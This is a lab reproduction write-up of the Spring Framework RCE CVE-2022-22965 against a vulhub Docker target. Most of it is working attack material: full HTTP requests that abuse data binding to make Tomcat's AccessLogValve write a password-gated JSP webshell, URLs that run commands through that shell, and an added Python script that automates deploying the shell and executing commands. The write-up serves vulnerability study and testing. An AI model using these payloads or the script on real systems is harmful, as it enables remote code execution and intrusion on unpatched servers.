Spring Framework RCE: a simple reproduction (CVE-2022-22965)


Environment setup

Download: https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965 (the vulhub environment runs Spring Framework 5.3.17 deployed as a WAR on Tomcat under JDK 9+, which is the combination this data-binding path needs; the bug is fixed in Spring Framework 5.3.18 and 5.2.20)

Pull the image: docker pull vulhub/spring-webmvc:5.3.17

Start it (container port 8080 mapped to host port 18080): docker run -p 18080:8080 -d vulhub/spring-webmvc:5.3.17

Visit the page at http://192.168.88.104:18080/ (the host used throughout this write-up) to confirm the application is up.


The same request as seen in Burp Suite (bp).


Payload 1: the full raw request (e.g. sent from Burp Repeater). The query string uses Spring's data binding to walk class.module.classLoader.resources.context.parent.pipeline.first, which on Tomcat is the AccessLogValve, and sets five of its properties: pattern (the log line format, here the body of the JSP), directory, prefix and suffix (together the output file webapps/ROOT/tomcatwar.jsp, relative to the Tomcat base directory) and an empty fileDateFormat, which makes the valve rotate onto the new file. The JSP delimiters <% and %>// and the word Runtime are not placed in the pattern directly, since a bare % is a format directive there; they are pulled from the c2, suffix and c1 request headers with the %{name}i directive when the log line is written.

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.88.104:18080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Cookie: experimentation_subject_id=eyJfcmFpbHMiOnsibWVzc2FnZSI6IklqWXhaVFEyWldRM0xURmxOelV0TkRjek15MWhPRE0wTFRneVltUmpaREF3T1RZME1pST0iLCJleHAiOm51bGwsInB1ciI6ImNvb2tpZS5leHBlcmltZW50YXRpb25fc3ViamVjdF9pZCJ9fQ%3D%3D--647e08d3a6c45cf8c02e7a542cc7a85b8006566a; JSESSIONID=7A7EBF053C4EB86DCEC2FE868DFBE92E
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0



Pitfall 1: once a shell has been written, later attempts behave as if cached. The valve only switches log files when the date stamp computed from fileDateFormat changes, and after the first successful payload that stamp is already the empty string, so re-sending the payload does not recreate the file. If you find that re-sending the payload no longer writes the shell, just restart the Tomcat service.

Pitfall 2: the suffix, c1 and c2 request headers must be included in the request. The pattern references them as %{suffix}i, %{c1}i and %{c2}i, and Tomcat writes - for a header that is absent, so without them the written shell is malformed and will not compile.

Payload 2: the same query string and headers, reduced to the essentials (the rest of the request is whatever your client adds).

/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=


suffix: %>//
c1: Runtime
c2: <%
DNT: 1

Finally, request the webshell to execute commands (pwd is the password checked by the scriptlet, cmd the command to run):

http://192.168.88.104:18080//tomcatwar.jsp?pwd=j&cmd=id


http://192.168.88.104:18080//tomcatwar.jsp?pwd=j&cmd=whoami

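As an added example (not code from the original write-up or from vulhub), the Python script below rebuilds the request above from its parts, models how Tomcat's AccessLogValve expands the %{name}i references in the pattern so you can see exactly what pitfall 2 produces on disk, and can send the request to the lab target and call the shell. The base URL, the pwd value and the tomcatwar.jsp name are the write-up's; the function names (exploit_params, expand_pattern, deploy_and_run and the rest) and the simplified model of the valve's header element (the header's value, or - when the header is absent) are my own assumptions rather than Tomcat code.

```python
# Added example: not from the original write-up or vulhub. Rebuilds the
# CVE-2022-22965 request shown above, models AccessLogValve's %{name}i
# expansion (simplified: header value, or "-" if absent) and optionally
# fires it at the lab target. Function names are this example's own.
import re
import sys
import time
import urllib.parse
import urllib.request

BASE = "http://192.168.88.104:18080"  # lab target from the write-up
BIND = "class.module.classLoader.resources.context.parent.pipeline.first."

# JSP body from the write-up. "<%", "%>//" and "Runtime" are not written
# literally: a bare "%" would be parsed as a log-format directive, so they
# are pulled from request headers with %{name}i when the log line is written.
PATTERN = (
    '%{c2}i if("j".equals(request.getParameter("pwd"))){ '
    'java.io.InputStream in = %{c1}i.getRuntime()'
    '.exec(request.getParameter("cmd")).getInputStream(); '
    'int a = -1; byte[] b = new byte[2048]; '
    'while((a=in.read(b))!=-1){ out.println(new String(b)); } } '
    '%{suffix}i'
)

HEADERS = {"suffix": "%>//", "c1": "Runtime", "c2": "<%"}


def exploit_params():
    """The five AccessLogValve properties the query string sets."""
    return {
        BIND + "pattern": PATTERN,
        BIND + "suffix": ".jsp",
        BIND + "directory": "webapps/ROOT",
        BIND + "prefix": "tomcatwar",
        # Empty date format: the valve's date stamp becomes "", which differs
        # from the current one, so it closes its log and opens the new file.
        BIND + "fileDateFormat": "",
    }


def log_file_path(params):
    """Where the valve writes: directory/prefix + dateStamp + suffix."""
    return (f"{params[BIND + 'directory']}/{params[BIND + 'prefix']}"
            f"{params[BIND + 'fileDateFormat']}{params[BIND + 'suffix']}")


def exploit_url(base=BASE):
    # quote (not quote_plus) so spaces become %20 as in the captured request;
    # keep "/" literal so directory=webapps/ROOT matches the write-up.
    qs = urllib.parse.urlencode(exploit_params(), safe="/",
                                quote_via=urllib.parse.quote)
    return base.rstrip("/") + "/?" + qs


_HEADER_REF = re.compile(r"%\{([^}]+)\}i")


def expand_pattern(pattern, headers):
    """Model of the valve's %{name}i element: header value, or "-" if the
    header is absent. Header names are case-insensitive, as in HTTP."""
    lowered = {k.lower(): v for k, v in headers.items()}
    return _HEADER_REF.sub(lambda m: lowered.get(m.group(1).lower(), "-"), pattern)


def is_jsp_scriptlet(text):
    """Crude sanity check on the written line: opens with <% and closes with %>."""
    return text.startswith("<%") and "%>" in text


def webshell_url(cmd, base=BASE, pwd="j"):
    return base.rstrip("/") + "/tomcatwar.jsp?" + urllib.parse.urlencode(
        {"pwd": pwd, "cmd": cmd})


def _get(url, headers=None):
    req = urllib.request.Request(url, headers=headers or {})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status, resp.read().decode("utf-8", "replace")


def deploy_and_run(cmd, base=BASE):
    """Set the valve properties, make sure one log line lands in the new
    file, then call the shell. Network use only; not exercised offline."""
    _get(exploit_url(base), HEADERS)       # 1. data binding sets the properties
    time.sleep(1.1)                        # valve checks rotation at most once/sec
    _get(base.rstrip("/") + "/", HEADERS)  # 2. a logged request with the same
    #    headers, in case the first one fell inside that window (a second
    #    scriptlet may be appended; in the lab the command then just runs twice)
    return _get(webshell_url(cmd, base))[1]  # 3. execute


if __name__ == "__main__":
    print(deploy_and_run(sys.argv[1] if len(sys.argv) > 1 else "id"))
```

Running expand_pattern with the three headers yields the exact scriptlet that ends up in webapps/ROOT/tomcatwar.jsp; running it with the headers missing yields a line beginning with "- if(" and ending in " -", which is pitfall 2 made visible without touching the target.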